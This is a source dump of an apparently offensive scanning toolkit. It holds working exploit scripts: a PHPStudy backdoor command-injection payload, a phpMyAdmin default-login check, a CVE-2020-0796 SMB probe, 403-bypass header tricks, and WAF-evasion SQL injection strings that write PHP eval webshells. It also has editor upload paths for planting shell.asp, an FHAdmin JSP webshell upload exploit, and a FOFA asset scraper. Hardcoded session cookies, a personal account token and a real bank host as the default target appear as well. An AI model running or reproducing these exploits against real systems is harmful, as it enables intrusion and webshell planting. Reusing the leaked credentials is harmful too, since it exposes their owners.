        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def PHPStudyBackdoor(self):
        """Backdoor check: a base64 value in the accept-charset header, confirmed via Dnslog.

        Sends one GET to /index.php, sleeps 2 s, then treats a DNS callback
        (DL.result()) as success and sets self.status = 'success'.  The payload
        is a bytes object (base64.b64encode), so it is placed in the header and
        in the info string as bytes.
        """
        DL = Dnslog() # obtain a Dnslog host
        appName = 'PHPStudy'   # unused
        pocname = 'PHPStudyBackdoor'
        path = '/index.php'
        method = 'get'
        desc = 'PHPStudyBackdoor脚本漏洞'   # unused
        payload = ('''system("ping {}");''').format(DL.dns_host())
        payload = base64.b64encode(payload.encode('utf-8'))
        Headers = {
            'Sec-Fetch-Mode' : 'navigate',
            'Sec-Fetch-User' : '?1',
            'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site' : 'none',
            'accept-charset' : payload
        }
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)

        try:
            exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False)
            time.sleep(2)   # give the callback time to arrive before polling
            if DL.result():
                info = "存在phpStudyBackdoor脚本漏洞, Payload:{}".format(payload)
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))

    def PHPStudyphpmyadmin(self):
        """Default-credential check against /phpmyadmin/index.php.

        POSTs the root/root login form, then GETs the same path; success
        requires 'navigation.php' in the second body and 'frame_navigation' in
        the first (case-insensitive), and sets self.status = 'success'.
        Whether the session carries over between the two calls depends on
        ExpRequest (not shown) — confirm.
        """
        appName = 'PHPStudy'   # unused
        pocname = 'PHPStudyphpmyadmin'
        path = "/phpmyadmin/index.php"
        method = 'post'
        desc = 'phpstudy_phpmyadmin默认密码漏洞'   # unused
        payload = {
            "pma_username": "root",
            "pma_password": "root",
            "server": "1",
            "target": "index.php"
        }
        Headers = {
            'Accept' : '*/*',
            'Content-Type' : 'application/x-www-form-urlencoded'
        }
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)

        try:
            resp = exprequest.post(self.url+path, data=payload, headers=Headers, timeout=self.timeout, verify=False).text
            resp2 = exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False).text

            if resp2.lower().find('navigation.php')!=-1 and resp.lower().find('frame_navigation')!=-1:
                info = "存在phpstudy_phpmyadmin默认密码漏洞"
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))

    def PHPStudyProbe(self):
        """Probe-page exposure check: GET /l.php.

        Success requires both 'php_version' and 'phpstudy' in the lower-cased
        body and sets self.status = 'success'.
        """
        appName = 'PHPStudy'   # unused
        pocname = 'PHPStudyProbe'
        path = '/l.php'
        method = 'get'
        desc = 'PHPStudy探针泄露漏洞'   # unused
        # Output / ExpRequest come from util.ExpRequest (not shown here).
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)

        try:
            resp = exprequest.get(self.url+path, timeout=self.timeout, verify=False).text

            if resp.lower().find('php_version')!=-1 and resp.lower().find('phpstudy')!=-1:
                info = "存在phpstudy探针泄露漏洞"
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(PHPStudy) is called
    (alphabetical order), 'name -> status' lines are collected with status
    reset to 'fail' after each call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpPHPStudy = PHPStudy(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpPHPStudy, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpPHPStudy.status
    else:# run every POC method
        for func in dir(PHPStudy):
            if not func.startswith("__"):
                methodcaller(func)(ExpPHPStudy)
                result_list.append(func+' -> '+ExpPHPStudy.status)
                ExpPHPStudy.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/WindowsSMBv3.py: --------------------------------------------------------------------------------
from util.ExpRequest import ExpRequest,Output
from operator import methodcaller
import socket
import struct
class WindowsSMBv3():
    """SMBv3 checks: one method per POC, dispatched by check() below."""
    def __init__(self, **env):
        """
        Initialise the parameters shared by all POC methods from the env dict.

        timeout / retry_time / retry_interval must be present and numeric (int()),
        although CVE_2020_0796 uses a fixed 3 s socket timeout instead.  'url'
        is passed to socket.gethostbyname(), so it is expected to be a bare
        host name or IP rather than a URL.  win_cmd / linux_cmd are unused here.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def CVE_2020_0796(self):
        """CVE-2020-0796 version check over a single SMB2 NEGOTIATE exchange on TCP/445.

        Sends the fixed negotiate packet, reads the 4-byte NetBIOS length and
        then the response, and inspects res[68:70] / res[70:72] (presumably the
        negotiated dialect and the negotiate-context count — confirm against
        MS-SMB2).  Only dialect b"\\x11\\x03" with count b"\\x02\\x00" is
        reported as success (self.status = 'success').  The socket is never
        closed explicitly; the fixed 3 s timeout ignores self.timeout.
        """
        appName = 'Windows'   # unused
        pocname = 'CVE_2020_0796'
        method = 'socket'
        payload = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        desc = 'Windows : CVE_2020_0796'   # unused
        info = 'WindowsSMBv3协议漏洞'   # overwritten on success below
        # Output / ExpRequest come from util.ExpRequest (not shown here); exprequest is unused in this method.
        output = Output(pocname)
        # Request wrapper.
        exprequest = ExpRequest(pocname, output)

        try:
            sock = socket.socket(socket.AF_INET)
            sock.settimeout(3)
            ip = socket.gethostbyname(self.url)
            sock.connect((ip, 445))
            sock.send(payload)
            nb, = struct.unpack(">I", sock.recv(4))   # NetBIOS session header: big-endian length of the SMB2 message
            res = sock.recv(nb)
            if (not res[68:70] == b"\x11\x03") or (not res[70:72] == b"\x02\x00"):
                output.fail()
            else:
                info = "{}存在WindowsSMBv3协议漏洞(CVE-2020-0796), IP值:{}".format(self.url,ip)
                output.echo_success(method, info)
                self.status = 'success'
        except Exception as error:
            output.error_output(str(error))

def check(**kwargs):
    """Entry point used by EXP/ALL.py.

    With kwargs['pocname'] != 'ALL' the named method is called and self.status
    is returned.  With 'ALL' every non-dunder name in dir(WindowsSMBv3) is
    called, 'name -> status' lines are collected with status reset to 'fail'
    after each call, and the joined list is returned.
    """
    result_list = []
    result_list.append('----------------------------')
    ExpWindowsSMBv3 = WindowsSMBv3(**kwargs)
    if kwargs['pocname'] != 'ALL':
        func = getattr(ExpWindowsSMBv3, kwargs['pocname'])# bound method looked up by name
        func()# run it
        return ExpWindowsSMBv3.status
    else:# run every POC method
        for func in dir(WindowsSMBv3):
            if not func.startswith("__"):
                methodcaller(func)(ExpWindowsSMBv3)
                result_list.append(func+' -> '+ExpWindowsSMBv3.status)
                ExpWindowsSMBv3.status = 'fail'
        result_list.append('----------------------------')
        return '\n'.join(result_list)

--------------------------------------------------------------------------------
/EXP/__init__.py: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/EXP/__init__.py
--------------------------------------------------------------------------------
# ===== /POC/ByPass403.py =====
# Sends a fixed set of variant requests to a URL that answers 403 and reports
# which variants get a different status. Every probe below only succeeds when
# the origin or an intermediary trusts client-supplied headers (Host,
# X-Original-URL / X-Rewrite-URL, Referer, X-Forwarded-* style client-IP
# headers) or normalises the path loosely; the mitigation is therefore to strip
# those headers from untrusted clients at the edge and to authorise on the
# canonical, normalised path.
from ClassCongregation import color
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Host header values tried by Change_Host.
Trust_Domain = ['www.baidu.com','www.google.com','home.firefoxchina.cn','www.zhihu.com','www.csdn.net','www.weibo.com']
# Values sent in X-Original-URL / X-Rewrite-URL by Add_Original.
Trust_Original = ['/admin','/console']
# Referer values tried by Add_Referer.
Trust_Referer = ['http://www.baidu.com']
# Addresses placed in the client-IP headers by Add_Proxy.
Trust_Proxy = ['127.0.0.1', '114.114.114.114']
# Suffixes appended verbatim to the URL by Add_Extend (the entries starting
# with '?' are appended as-is, so the result depends on whether the URL
# already carries a query string).
Trust_Extend = ['/', '//', '/*', '/*/', '/.', '/./', '/./.', '?', '??', '???', '..;/', '/..;/', '%20/', '%09/']

# NOTE(review): the Cookie below contains what look like live session
# identifiers (JSESSIONID, jeesite.session.id) committed to source, and every
# request is sent with verify=False, so they also travel over unverified TLS.
# Treat them as compromised, rotate them, and load any session material from
# configuration rather than the repository.
org_headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US, en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close',
    'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1',
}

# NOTE(review): only referenced by a commented-out line in Add_Original; no
# request in this file actually goes through the proxy.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
TIMEOUT = 2
def Change_Host(url: str, TIMEOUT: int = TIMEOUT) -> None:
    """Request *url* once per Trust_Domain entry, with that entry as the Host header.

    Prints one colour-coded line per attempt: green for 200, blue for any
    other non-403 status, red for 403 or a request error. Redirects are not
    followed. Returns nothing.
    """
    for i in Trust_Domain:
        # Same header set as org_headers plus Host; the Cookie is duplicated
        # here verbatim instead of being merged from org_headers.
        headers = {
            'Host': '%s'%i,
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US, en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'close',
            'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1'
        }
        try:
            resp_code = requests.get(url=url, headers=headers,
                                     timeout=TIMEOUT,
                                     allow_redirects=False,
                                     verify = False).status_code
            if resp_code == 200:
                color('[+] Host: %s %s'%(i, resp_code), 'green')
            elif resp_code != 403:
                color('[?] Host: %s %s'%(i, resp_code), 'blue')
            else:
                color('[-] Host: %s %s'%(i, resp_code), 'red')
        except Exception as error:
            # `error` is not used: any failure (timeout, DNS, TLS) is reported
            # as "done" and the loop moves on.
            color('[-] Host: %s done!'%i, 'red')
            continue

def Add_Original(url: str, TIMEOUT: int = TIMEOUT) -> None:
    """Request *url* once per Trust_Original entry, sent in X-Original-URL and X-Rewrite-URL.

    Output convention is the same as Change_Host. Returns nothing.
    """
    for i in Trust_Original:
        Add_headers = {
            'X-Original-URL': i,
            'X-Rewrite-URL': i
        }
        # Later keys win, so the override headers are added on top of org_headers.
        headers = {**org_headers, **Add_headers}
        try:
            resp_code = requests.get(url=url, headers=headers,
                                     timeout=TIMEOUT,
                                     allow_redirects=False,
                                     #proxies=proxies,
                                     verify = False).status_code
            if resp_code == 200:
                color('[+] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'green')
            elif resp_code != 403:
                color('[?] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'blue')
            else:
                color('[-] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'red')
        except Exception as error:
            color('[-] X-Original-URL/X-Rewrite-URL: %s done!'%(i), 'red')
            continue

def Add_Referer(url: str, TIMEOUT: int = TIMEOUT) -> None:
    """Request *url* once per Trust_Referer entry, sent as the Referer header.

    Output convention is the same as Change_Host. Returns nothing.
    """
    for i in Trust_Referer:
        Add_headers = {
            'Referer': i
        }
        headers = {**org_headers, **Add_headers}
        try:
            resp_code = requests.get(url=url, headers=headers,
                                     timeout=TIMEOUT,
                                     allow_redirects=False,
                                     verify = False).status_code
            if resp_code == 200:
                color('[+] Referer: %s %s'%(i, resp_code), 'green')
            elif resp_code != 403:
                color('[?] Referer: %s %s'%(i, resp_code), 'blue')
            else:
                color('[-] Referer: %s %s'%(i, resp_code), 'red')
        except Exception as error:
            color('[-] Referer: %s done!'%(i), 'red')
            continue

def Add_Proxy(url: str, TIMEOUT: int = TIMEOUT) -> None:
    """Request *url* once per Trust_Proxy address, placed in several client-IP headers.

    The report line only names X-Forwarded-For, although all seven headers in
    Add_headers are sent together, so a hit cannot be attributed to one of
    them from the output alone. Returns nothing.
    """
    for Trust_IP in Trust_Proxy:
        Add_headers = {
            'X-Originating-IP': Trust_IP,
            'X-Remote-IP': Trust_IP,
            'X-Client-IP': Trust_IP,
            'X-Forwarded-For': Trust_IP,
            'X-Forwared-Host': Trust_IP,
            'X-Host': Trust_IP,
            'X-Custom-IP-Authorization': Trust_IP
        }
        headers = {**org_headers, **Add_headers}
        try:
            resp_code = requests.get(url=url, headers=headers,
                                     timeout=TIMEOUT,
                                     allow_redirects=False,
                                     verify = False).status_code
            if resp_code == 200:
                color('[+] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'green')
            elif resp_code != 403:
                color('[?] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'blue')
            else:
                color('[-] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'red')
        except Exception as error:
            color('[-] X-Forwarded-For: %s done!'%(Trust_IP), 'red')
            continue

def Add_Extend(url: str, TIMEOUT: int = TIMEOUT) -> None:
    """Request *url* + suffix once per Trust_Extend entry, with org_headers.

    Output convention is the same as Change_Host. Returns nothing.
    """
    for i in Trust_Extend:
        url_new = url + i
        try:
            resp_code = requests.get(url=url_new, headers=org_headers,
                                     timeout=TIMEOUT,
                                     allow_redirects=False,
                                     verify = False).status_code
            if resp_code == 200:
                color('[+] url: %s %s'%(url_new, resp_code), 'green')
            elif resp_code != 403:
                color('[?] url: %s %s'%(url_new, resp_code), 'blue')
            else:
                color('[-] url: %s %s'%(url_new, resp_code), 'red')
        except Exception as error:
            color('[-] url: %s done!'%(url_new), 'red')
            continue
        finally:
            # No observable effect: url_new is reassigned at the top of the
            # next iteration anyway.
            url_new = None

def check(**kwargs) -> None:
    """Entry point: verify that kwargs['url'] answers 403, then run every probe.

    Stops early (returning None) when the baseline request does not return
    403 or raises. NOTE(review): the baseline request follows redirects
    (allow_redirects is commented out) while every probe uses
    allow_redirects=False, so a target that redirects before answering 403
    may be judged on a different response than the probes see — confirm.
    """
    url = kwargs['url']
    #url = 'https://moa.cmbc.com.cn/moastatic'
    try:
        resp_code = requests.get(url=url, headers=org_headers,
                                 timeout=TIMEOUT,
                                 #allow_redirects=False,
                                 verify = False).status_code
        if resp_code != 403:
            color('[-] Page has not return 403!', 'red')
            return
    except Exception as error:
        color('[-] An error occurred %s'%type(error), 'red')
        return
    #url = url.strip('/')
    color('[*] Scanning target domain %s'%url, 'green')
    Change_Host(url)
    Add_Original(url)
    Add_Referer(url)
    Add_Proxy(url)
    Add_Extend(url)

if __name__ == "__main__":
    # NOTE(review): a hard-coded third-party production host should not ship
    # in the entry point; take the target from argv or configuration.
    check(**{'url':'https://moa.cmbc.com.cn/moastatic/'})

# ===== /POC/ByWAF_Mysql.py =====
def tamper1(payload: str) -> str:
    """Rewrite *payload* by a fixed sequence of substring substitutions.

    A falsy payload is returned unchanged. Substitutions are applied in
    order and each one sees the output of the previous one, so later rules
    also act on text introduced by earlier ones.
    """
    if payload:
        payload=payload.replace(" ","/*!90000aaa*/")
        payload=payload.replace("+","/*!90000aaa*/")
        payload=payload.replace("and","%26%26")
        payload=payload.replace("=","/*!90000aaa*/=/*!90000aaa*/")
        payload=payload.replace("union","union/*!90000aaa*/")
        payload=payload.replace("#","/*!90000aaa*/%23")
        payload=payload.replace("user()","user/*!()*/")
        payload=payload.replace("database()","database/*!()*/")
        payload=payload.replace("--","/*!90000aaa*/--")
        payload=payload.replace("select","/*!90000aaa*/select")
        payload=payload.replace("from","/*!90000aaa*//*!90000aaa*/from")
    return payload

# tamper2's body continues on the next line of the dump; only its header and
# guard are visible here.
def tamper2(payload):
    if payload:
payload=payload.replace(" ","%23a%0a") 19 | payload=payload.replace("+","%23a%0a") 20 | payload=payload.replace("order","order%23a%0a") 21 | payload=payload.replace("--","/*!90000aaa*/--") 22 | payload=payload.replace("#","/*!90000aaa*/%23") 23 | payload=payload.replace("and","%26%26") 24 | payload=payload.replace("union","union%23a%0a") 25 | payload=payload.replace("user()","user/*!()*/") 26 | payload=payload.replace("version()","version/*!()*/") 27 | payload=payload.replace("database()","database/*!()*/") 28 | payload=payload.replace("group","group%23a%0a") 29 | payload=payload.replace("select","select%23a%0a") 30 | payload=payload.replace("from","from%23a%0a") 31 | return payload 32 | 33 | print('Mysql混淆,目标处输入语句!') 34 | print('''常用语句: 35 | '+like+substr(1/(case+when+substr(database(),6,1)='N'+then+1+else+0+end),1,1)='a 36 | 1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) 37 | 1'and substr((select database()),1,1)='a 38 | 1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+ 39 | 1'union select null,null,0x3c3f70687020406576616c28245f504f53545b76616c75655d293b3f3e into outfile '/var/www/html/1.php'--+ 40 | 1' union select 1,2,'<%3fphp+%40eval(%24_POST[shell])%3b%3f>' into outfile '路径'--+ 41 | 1' into outfile '路径' fields terminated by '<%3fphp+%40eval(%24_POST[shell])%3b%3f>'--+''') 42 | def check(**kwargs): 43 | payload = kwargs['url'] 44 | payload1 = tamper1(payload) 45 | payload2 = tamper2(payload) 46 | 47 | print('语句一: %s'%payload1) 48 | print('语句二: %s'%payload2) 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- /POC/Editor_vul.py: -------------------------------------------------------------------------------- 1 | from ClassCongregation import color 2 | import requests 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | ueditor_path = 
['/ueditor.config.js','/net/controller.ashx?action=catchimage','/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:80/0f3927bc-5f26-11e8-9c2d-fa7ae01bbebc.png'] 7 | kindeditor_path = ['/kindeditor-all.min.js','/asp/upload_json.asp?dir=file','/asp.net/upload_json.ashx?dir=file','/jsp/upload_json.jsp?dir=file','/php/upload_json.php?dir=file'] 8 | ckfinder_path = ['ckfinder.html','/core/connector/java/connector.java?command=FileUpload&type=files¤tFolder=/&langCode=zh-cn&hash=&response_type=txt'] 9 | fckeditor_path = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector
.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/'] 10 | 11 | org_headers = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)', 13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 14 | 'Accept-Language': 'en-US, en;q=0.5', 15 | 'Accept-Encoding': 'gzip, deflate', 16 | 'Connection': 'close', 17 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1', 18 | } 19 | 20 | proxies = { 21 | "http": "http://127.0.0.1:8080", 22 | "https": "http://127.0.0.1:8080", 23 | } 24 | TIMEOUT = 2 25 | def Editor_check(url, editor_path, TIMEOUT=TIMEOUT): 26 | for i in editor_path: 27 | try: 28 | resp = requests.get(url=url + i, headers=org_headers, 29 | timeout=TIMEOUT, 30 | allow_redirects=False, 31 | verify = False) 32 | if resp.status_code == 200 and 'DOCTYPE' not in 
resp.text: 33 | color('[+] Host: %s %s'%(url + i, resp.status_code), 'green') 34 | print(resp.text[:50]) 35 | else: 36 | color('[-] Host: %s %s'%(url + i, resp.status_code), 'red') 37 | except Exception as error: 38 | color('[-] Host: %s done!'%(url + i), 'red') 39 | continue 40 | 41 | def check(**kwargs): 42 | url = kwargs['url'].strip('/') 43 | #url = 'https://moa.cmbc.com.cn/moastatic' 44 | #url = url.strip('/') 45 | color('[*] Scanning target domain %s'%url, 'green') 46 | Editor_check(url,ueditor_path) 47 | Editor_check(url,kindeditor_path) 48 | Editor_check(url,ckfinder_path) 49 | Editor_check(url,fckeditor_path) 50 | 51 | if __name__ == "__main__": 52 | check(**{'url':'***'}) 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /POC/FHAdmin.py: -------------------------------------------------------------------------------- 1 | from urllib3 import encode_multipart_formdata 2 | import requests,os,random 3 | 4 | shell_name = 'Caidao_cmd.jsp' 5 | 6 | def post_files(url,header,filename): 7 | data = {} 8 | data['imgFile']= (random_name(6,'.jsp'),open(scriptPath+'\\execScripts\\'+filename,'rb').read()) 9 | encode_data = encode_multipart_formdata(data) 10 | data = encode_data[0] 11 | header['Content-Type'] = encode_data[1] 12 | r = requests.post(url, headers=header, data=data, verify=False) 13 | return r.text 14 | 15 | def random_name(index,suffix=''): 16 | h = "abcdefghijklmnopqrstuvwxyz0123456789_" 17 | salt_cookie = "" 18 | for i in range(index): 19 | salt_cookie += random.choice(h) 20 | return salt_cookie+suffix 21 | 22 | scriptPath = os.getcwd() 23 | def check(**kwargs): 24 | shell_path = post_files(kwargs['url']+"/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/",{"cookie":"test"},shell_name) 25 | if requests.get(url=kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip(),verify=False,timeout=5).status_code !=404: 26 | print('[*]上传的shell路径: 
# (continuation of check() from /POC/FHAdmin.py: the print() whose string
#  literal is split here starts on the previous line of the dump)
'+kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip())
    else:
        print('[-]上传失败: '+shell_path)
if __name__=="__main__":
    pass

# ===== /POC/FOFA.py =====
# Scrapes fofa.info result pages for a query string and prints the unique
# host links found, using a logged-in session carried in two cookies.
import requests
from requests.packages import urllib3
urllib3.disable_warnings()
import base64
from lxml import etree

# NOTE(review): this is a bearer/refresh token for a personal account
# committed to source and sent with verify=False (no TLS certificate
# validation). Treat it as leaked and rotate it; read tokens from an
# environment variable or a config file that is excluded from the repository.
token = 'eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MzU5NjYsIm1pZCI6MTAwMDI2MDc2LCJ1c2VybmFtZSI6InhreDUxOCIsImV4cCI6MTY0NjMzODk5NywiaXNzIjoicmVmcmVzaCJ9.Aqfrl1A0C-WE_T5ZER2eaylK0SdJfWULS8bbnvqWSjlyFzNubPJjbPCqU9nJdKZwTPPUUXp6WBVw33R_tCVAbg'

# The same value is used for both session cookies.
fofa_token = token
refresh_token = token

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
}
# Usage banner, printed at import time (module-level side effect).
print('''[*]请登录后使用, fofa查询语法:
+--------------------------+---------------------------------------------+
| 例句 | 用途说明 |
+--------------------------+---------------------------------------------+
| title="beijing" | 从标题中搜索“北京”
| header="elastic" | 从http头中搜索“elastic”
| body="phpcms" | 从html正文中搜索“网络空间测绘”
| domain="qq.com" | 搜索根域名带有qq.com的网站
| icp="ICP-030173号" | 查找备案号为“京ICP证030173号”的网站
| host=".gov.cn" | 从url中搜索”.gov.cn”
| port="6379" | 查找对应“6379”端口的资产
| ip="1.1.1.1" | 从ip中搜索包含“1.1.1.1”的网站
| ip="220.181.111.1/24" | 查询IP为“220.181.111.1”的C网段资产
| protocol="quic" | 查询quic协议资产
| country="CN" | 搜索指定国家(编码)的资产
| app="Microsoft-Exchange" | 搜索Microsoft-Exchange设备
| cert="baidu" | 搜索证书(https或者imaps等)中带有baidu的资产
| status_code="402" | 查询服务器状态为“402”的资产
+--------------------------+---------------------------------------------+
''')
# Get the number of result pages for a query.
def pag_num_fun(word: str) -> str:
    """Fetch page 1 of the results for *word* and return the last pager label.

    The return value is the text of the last <li> in the pager, i.e. a string,
    not an int. NOTE(review): when the XPath lookup raises (no pager on the
    page, e.g. zero results or an expired session), only a message is
    printed and `pag_num` is left unbound, so the print() after the
    try/except raises NameError — that is what check() ends up catching.
    """
    print("[*]开始获取查询的页面数量...")
    # base64-encode the query term (the site expects it in qbase64=).
    s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
    # query URL
    url = f"https://fofa.info/result?qbase64={s}&page=1&page_size=10"
    print("[*]查询地址为:",url)
    # fetch the page source
    text = requests.get(url=url,headers=headers,verify=False,timeout=20,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
    # extract the page count
    tree = etree.HTML(text)
    try:
        # pag_num: total number of result pages
        pag_num = tree.xpath('//div[@id="__layout"]//div[@class="pagFooter"]/div[@class="el-pagination"]/ul[@class="el-pager"]/li/text()')[-1]
    except Exception as error:
        print('[-]查询目标无结果,请确认查询语法.详细错误为:%s'%type(error))
        #return
        #raise Exception("")
    print('[*]FOFA爬取页面数量为: '+ pag_num)
    return pag_num

# Crawl result pages and collect host links.
